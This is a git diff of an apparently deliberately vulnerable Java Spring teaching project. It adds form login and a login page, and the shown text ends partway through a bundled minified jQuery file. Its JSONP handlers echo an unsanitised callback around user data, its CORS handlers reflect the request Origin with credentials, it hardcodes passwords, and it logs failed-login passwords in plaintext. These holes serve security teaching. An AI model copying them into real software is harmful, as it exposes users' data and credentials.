.../joychou/security/LoginSuccessHandler.java | 30 +++++ .../org/joychou/security/SecurityUtil.java | 2 - .../joychou/security/WebSecurityConfig.java | 27 ++++- src/main/resources/application.properties | 2 +- src/main/resources/static/css/login.css | 106 ++++++++++++++++++ .../resources/static/js/jquery-1.11.1.min.js | 4 + src/main/resources/templates/csrfTest.html | 27 ----- src/main/resources/templates/form.html | 19 ++++ src/main/resources/templates/login.html | 41 +++++++ 19 files changed, 397 insertions(+), 64 deletions(-) create mode 100644 src/main/java/org/joychou/controller/Login.java create mode 100644 src/main/java/org/joychou/security/LoginFailureHandler.java create mode 100644 src/main/java/org/joychou/security/LoginSuccessHandler.java create mode 100644 src/main/resources/static/css/login.css create mode 100644 src/main/resources/static/js/jquery-1.11.1.min.js delete mode 100644 src/main/resources/templates/csrfTest.html create mode 100644 src/main/resources/templates/form.html create mode 100644 src/main/resources/templates/login.html diff --git a/README.md b/README.md index b273bf10..77dfd32f 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,27 @@ This project can also be called Java vulnerability code. Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments. +## Authenticate + +### Login + +[http://localhost:8080/login](http://localhost:8080/login) + +If you are not logged in, accessing any page will redirect you to the login page. The username & password are as follows. + +``` +admin/admin123 +joychou/joychou123 +``` + +### Logout + +[http://localhost:8080/logout](http://localhost:8080/logout) + +### RememberMe + +Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-operational session will expire. In order to solve this problem, the rememberMe function is introduced, and the default expiration time is 2 weeks. + ## Vulnerability Code Sort by letter. diff --git a/README_zh.md b/README_zh.md index 88d31149..f94932a1 100644 --- a/README_zh.md +++ b/README_zh.md @@ -10,6 +10,26 @@ 每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。具体可查看每个漏洞代码和注释。 +## 认证 + +### 登录 + +[http://localhost:8080/login](http://localhost:8080/login) + +如果未登录,访问任何页面都会重定向到login页面。用户名和密码如下。 + +``` +admin/admin123 +joychou/joychou123 +``` +### 登出 + +[http://localhost:8080/logout](http://localhost:8080/logout) + +### 记住我 + +Tomcat默认JSESSION会话有效时间为30分钟,所以30分钟不操作会话将过期。为了解决这一问题,引入rememberMe功能,默认过期时间为2周。 + ## 漏洞代码 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java index 6c8d5625..bf93c7ce 100644 --- a/src/main/java/org/joychou/controller/CORS.java +++ b/src/main/java/org/joychou/controller/CORS.java @@ -1,10 +1,10 @@ package org.joychou.controller; import org.joychou.security.SecurityUtil; -import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.CrossOrigin; import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.joychou.controller.jsonp.JSONP; +import org.springframework.web.bind.annotation.RestController; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @@ -15,7 +15,7 @@ * @desc https://github.com/JoyChou93/java-sec-code/wiki/CORS */ -@Controller +@RestController @RequestMapping("/cors") public class CORS { @@ -23,7 +23,6 @@ public class CORS { protected static String[] urlwhitelist = {"joychou.com", "joychou.me"}; @RequestMapping("/vuls1") - @ResponseBody private static String vuls1(HttpServletRequest request, HttpServletResponse response) { // 获取Header中的Origin String origin = request.getHeader("origin"); @@ -33,7 +32,6 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp } @RequestMapping("/vuls2") - @ResponseBody private static String vuls2(HttpServletResponse response) { // 不建议设置为* // 后端设置Access-Control-Allow-Origin为*的情况下,跨域的时候前端如果设置withCredentials为true会异常 @@ -43,15 +41,13 @@ private static String vuls2(HttpServletResponse response) { @CrossOrigin("*") @RequestMapping("/vuls3") - @ResponseBody private static String vuls3(HttpServletResponse response) { return info; } @RequestMapping("/sec") - @ResponseBody - private static String seccode(HttpServletRequest request, HttpServletResponse response) { + public String seccode(HttpServletRequest request, HttpServletResponse response) { String origin = request.getHeader("Origin"); // 如果origin不为空并且origin不在白名单内,认定为不安全。 @@ -61,7 +57,7 @@ private static String seccode(HttpServletRequest request, HttpServletResponse re } response.setHeader("Access-Control-Allow-Origin", origin); response.setHeader("Access-Control-Allow-Credentials", "true"); - return info; + return JSONP.getUserInfo(request); } diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java index ea33c59e..5481260e 100644 --- a/src/main/java/org/joychou/controller/CSRF.java +++ b/src/main/java/org/joychou/controller/CSRF.java @@ -7,20 +7,18 @@ import org.springframework.web.bind.annotation.ResponseBody; /** - * @author JoyChou (joychou@joychou.org) - * @date 2019.05.31 - * @desc check csrf using spring-security - * @usage Access http://localhost:8080/csrf/ -> click submit + * check csrf using spring-security + * Access http://localhost:8080/csrf/ -> click submit + * + * @author JoyChou (joychou@joychou.org) @2019-05-31 */ - - @Controller @RequestMapping("/csrf") public class CSRF { @GetMapping("/") public String index() { - return "csrfTest"; + return "form"; } @PostMapping("/post") diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java index 4f2fab99..e38761d1 100644 --- a/src/main/java/org/joychou/controller/Index.java +++ b/src/main/java/org/joychou/controller/Index.java @@ -6,6 +6,7 @@ import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; +import javax.servlet.http.HttpServletRequest; import java.util.HashMap; import java.util.Map; @@ -18,11 +19,14 @@ @Controller public class Index { - @RequestMapping("/") + @RequestMapping("/index") @ResponseBody - public static String index() { + public static String index(HttpServletRequest request) { + String username = request.getUserPrincipal().getName(); Map m = new HashMap(); - m.put("app_name", "java_vul_code"); + m.put("username", username); + m.put("login", "success"); + m.put("app_name", "java security code"); m.put("java_version", System.getProperty("java.version")); m.put("fastjson_version", JSON.VERSION); diff --git a/src/main/java/org/joychou/controller/Login.java b/src/main/java/org/joychou/controller/Login.java new file mode 100644 index 00000000..7983efcd --- /dev/null +++ b/src/main/java/org/joychou/controller/Login.java @@ -0,0 +1,58 @@ +package org.joychou.controller; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.security.core.Authentication; +import org.springframework.security.core.context.SecurityContextHolder; +import org.springframework.security.web.authentication.logout.SecurityContextLogoutHandler; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; + +import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; + + +@Controller +public class Login { + + protected final Logger logger = LoggerFactory.getLogger(this.getClass()); + + @RequestMapping("/login") + public String login() { + return "login"; + } + + @GetMapping("/logout") + public String logoutPage (HttpServletRequest request, HttpServletResponse response) { + + String username = request.getUserPrincipal().getName(); + + Authentication auth = SecurityContextHolder.getContext().getAuthentication(); + if (auth != null) { + new SecurityContextLogoutHandler().logout(request, response, auth); + } + + String[] deleteCookieKey = {"JSESSIONID", "remember-me"}; // delete cookie + for (String key : deleteCookieKey) { + Cookie cookie = new Cookie(key, null); + cookie.setMaxAge(0); + cookie.setPath("/"); + response.addCookie(cookie); + } + + if (null == request.getUserPrincipal()) { + logger.info("User " + username + " logout successfully."); + } else { + logger.info("User " + username + " logout failed. Please try again."); + } + + return "redirect:/login?logout"; + } + + @RequestMapping("/") + public String redirect() { + return "redirect:/index"; + } +} diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java index 2f474440..9c7eac25 100644 --- a/src/main/java/org/joychou/controller/jsonp/JSONP.java +++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java @@ -7,7 +7,9 @@ import org.springframework.web.bind.annotation.*; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; - +import java.security.Principal; +import java.util.HashMap; +import java.util.Map; /** @@ -19,10 +21,20 @@ @RequestMapping("/jsonp") public class JSONP { - private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; private static String[] urlwhitelist = {"joychou.com", "joychou.org"}; + // get current login username + public static String getUserInfo(HttpServletRequest request) { + Principal principal = request.getUserPrincipal(); + + String username = principal.getName(); + + Map m = new HashMap(); + m.put("Username", username); + + return JSON.toJSONString(m); + } /** * Set the response content-type to application/javascript. * @@ -30,9 +42,9 @@ public class JSONP { * */ @RequestMapping(value = "/referer", produces = "application/javascript") - private static String referer(HttpServletRequest request, HttpServletResponse response) { + private String referer(HttpServletRequest request, HttpServletResponse response) { String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } /** @@ -43,7 +55,7 @@ private static String referer(HttpServletRequest request, HttpServletResponse re * */ @RequestMapping(value = "/emptyReferer", produces = "application/javascript") - private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { + private String emptyReferer(HttpServletRequest request, HttpServletResponse response) { String referer = request.getHeader("referer"); if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { @@ -51,7 +63,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon } String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } /** @@ -63,8 +75,8 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon * Such as JSONOjbect or JavaBean. String type cannot be used. */ @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE) - public JSONObject advice() { - return JSON.parseObject(info); + public JSONObject advice(HttpServletRequest request) { + return JSON.parseObject(getUserInfo(request)); } @@ -73,7 +85,7 @@ public JSONObject advice() { * http://localhost:8080/jsonp/sec?callback=test */ @RequestMapping(value = "/sec", produces = "application/javascript") - private static String safecode(HttpServletRequest request, HttpServletResponse response) { + private String safecode(HttpServletRequest request, HttpServletResponse response) { String referer = request.getHeader("referer"); if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { @@ -81,7 +93,7 @@ private static String safecode(HttpServletRequest request, HttpServletResponse r } String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; + return callback + "(" + getUserInfo(request) + ")"; } diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java index b15d7589..ef332360 100644 --- a/src/main/java/org/joychou/security/AntObjectInputStream.java +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java @@ -13,7 +13,7 @@ */ public class AntObjectInputStream extends ObjectInputStream { - private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); + protected final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); public AntObjectInputStream(InputStream inputStream) throws IOException { super(inputStream); diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index 65d9e6f3..8471ea0c 100644 --- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -19,7 +19,7 @@ */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { - private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class); + protected final Logger logger= LoggerFactory.getLogger(this.getClass()); @Override public void handle(HttpServletRequest request, HttpServletResponse response, diff --git a/src/main/java/org/joychou/security/LoginFailureHandler.java b/src/main/java/org/joychou/security/LoginFailureHandler.java new file mode 100644 index 00000000..ab3329e1 --- /dev/null +++ b/src/main/java/org/joychou/security/LoginFailureHandler.java @@ -0,0 +1,32 @@ +package org.joychou.security; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.http.MediaType; +import org.springframework.security.core.AuthenticationException; +import org.springframework.security.web.authentication.AuthenticationFailureHandler; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; + + + +public class LoginFailureHandler implements AuthenticationFailureHandler { + + protected final Logger logger = LoggerFactory.getLogger(this.getClass()); + + @Override + public void onAuthenticationFailure(HttpServletRequest request, + HttpServletResponse response, AuthenticationException exception) + throws ServletException, IOException { + + logger.info("Login failed. " + request.getRequestURL() + + " username: " + request.getParameter("username") + + " password: " + request.getParameter("password") ); + + response.setContentType(MediaType.APPLICATION_JSON_VALUE); + response.getWriter().write("{\"code\":0, \"message\":\"Login failed.\"}"); + } + +} diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java new file mode 100644 index 00000000..05b7cb2c --- /dev/null +++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java @@ -0,0 +1,30 @@ +package org.joychou.security; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.http.MediaType; +import org.springframework.security.core.Authentication; +import org.springframework.security.web.authentication.AuthenticationSuccessHandler; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; + + + +public class LoginSuccessHandler implements AuthenticationSuccessHandler { + + private final Logger logger = LoggerFactory.getLogger(this.getClass()); + + @Override + public void onAuthenticationSuccess(HttpServletRequest request, + HttpServletResponse response, Authentication authentication) + throws ServletException, IOException { + + logger.info("USER : " + authentication.getName()+ " LOGIN success!"); + + // google ajax and sendRedirect + response.setContentType(MediaType.APPLICATION_JSON_VALUE); + response.getWriter().write("{\"code\":1,\"message\":\"Login success!\"}"); + } +} diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java index 63de75d8..edab9ab7 100644 --- a/src/main/java/org/joychou/security/SecurityUtil.java +++ b/src/main/java/org/joychou/security/SecurityUtil.java @@ -1,7 +1,5 @@ package org.joychou.security; - - import java.net.URI; public class SecurityUtil { diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java index 5ad22e2b..127115f3 100644 --- a/src/main/java/org/joychou/security/WebSecurityConfig.java +++ b/src/main/java/org/joychou/security/WebSecurityConfig.java @@ -1,7 +1,9 @@ package org.joychou.security; +import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Value; import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; @@ -47,15 +49,34 @@ public boolean matches(HttpServletRequest request) { @Override protected void configure(HttpSecurity http) throws Exception { - // http.csrf().disable() // 去掉csrf校验 // 默认token存在session里,用CookieCsrfTokenRepository改为token存在cookie里。 // 但存在后端多台服务器情况,session不能同步的问题,所以一般使用cookie模式。 http.csrf() .requireCsrfProtectionMatcher(csrfRequestMatcher) .ignoringAntMatchers(csrfExcludeUrl) // 不进行csrf校验的uri,多个uri使用逗号分隔 .csrfTokenRepository(new CookieCsrfTokenRepository()); - // 自定义csrf校验失败的代码,默认是返回403错误页面 http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler()); // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse()); + + // spring security login settings + http.authorizeRequests() + .antMatchers("/css/**", "/js/**").permitAll() // permit static resources + .anyRequest().authenticated().and() // any request authenticated except above static resources + .formLogin().loginPage("/login").permitAll() // permit all to access /login page + .successHandler(new LoginSuccessHandler()) + .failureHandler(new LoginFailureHandler()).and() + .logout().logoutUrl("/logout").permitAll().and() + .rememberMe(); // tomcat默认JSESSION会话有效时间为30分钟,所以30分钟不操作会话将过期。为了解决这一问题,引入rememberMe功能。 + } + + @Autowired + public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception { + auth + .inMemoryAuthentication() + .withUser("joychou").password("joychou123").roles("USER").and() + .withUser("admin").password("admin123").roles("USER", "ADMIN"); } -} \ No newline at end of file + +} + + diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index 9cf68432..8ba9a9b3 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/** # csrf token check joychou.security.csrf.enabled = true # URI without CSRF check (only support ANT url format) -joychou.security.csrf.exclude.url = /xxe/**, /fastjson/** +joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /login/** # method for CSRF check joychou.security.csrf.method = POST ### csrf configuration ends ### diff --git a/src/main/resources/static/css/login.css b/src/main/resources/static/css/login.css new file mode 100644 index 00000000..26401f4e --- /dev/null +++ b/src/main/resources/static/css/login.css @@ -0,0 +1,106 @@ +.login-page { + width: 360px; + padding: 8% 0 0; + margin: auto; +} +.form { + position: relative; + z-index: 1; + background: #ffffff; + max-width: 360px; + margin: 0 auto 100px; + padding: 45px; + text-align: center; + box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.2), 0 5px 5px 0 rgba(0, 0, 0, 0.24); +} +.form input { + outline: 0; + background: #f2f2f2; + width: 100%; + border: 0; + margin: 0 0 15px; + padding: 15px; + box-sizing: border-box; + font-size: 14px; +} +.form button { + text-transform: uppercase; + outline: 0; + background: #4caf50; + width: 100%; + border: 0; + padding: 15px; + color: #ffffff; + font-size: 14px; + -webkit-transition: all 0.3 ease; + transition: all 0.3 ease; + cursor: pointer; +} +.form button:hover, +.form button:active, +.form button:focus { + background: #43a047; +} +.form .message { + margin: 15px 0 0; + color: #b3b3b3; + font-size: 12px; +} +.form .message a { + color: #4caf50; + text-decoration: none; +} +.form .register-form { + display: none; +} +.form p { + text-align: left; + margin: 0; + font-size: 13px; +} +.form p input { + width: auto; + margin-right: 10px; +} +.container { + position: relative; + z-index: 1; + max-width: 300px; + margin: 0 auto; +} +.container:before, +.container:after { + content: ""; + display: block; + clear: both; +} +.container .info { + margin: 50px auto; + text-align: center; +} +.container .info h1 { + margin: 0 0 15px; + padding: 0; + font-size: 36px; + font-weight: 300; + color: #1a1a1a; +} +.container .info span { + color: #4d4d4d; + font-size: 12px; +} +.container .info span a { + color: #000000; + text-decoration: none; +} +.container .info span .fa { + color: #ef3b3a; +} +body { + background: #76b852; /* fallback for old browsers */ + background: -webkit-linear-gradient(right, #76b852, #8dc26f); + background: -moz-linear-gradient(right, #76b852, #8dc26f); + background: -o-linear-gradient(right, #76b852, #8dc26f); + background: linear-gradient(to left, #76b852, #8dc26f); + font-family: Lato,"PingFang SC","Microsoft YaHei",sans-serif; +} diff --git a/src/main/resources/static/js/jquery-1.11.1.min.js b/src/main/resources/static/js/jquery-1.11.1.min.js new file mode 100644 index 00000000..88a5832a --- /dev/null +++ b/src/main/resources/static/js/jquery-1.11.1.min.js @@ -0,0 +1,4 @@ +/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */ +!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||m.guid++,e):void 0},now:function(){return+new Date},support:k}),m.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function r(a){var b=a.length,c=m.type(a);return"function"===c||m.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var s=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="
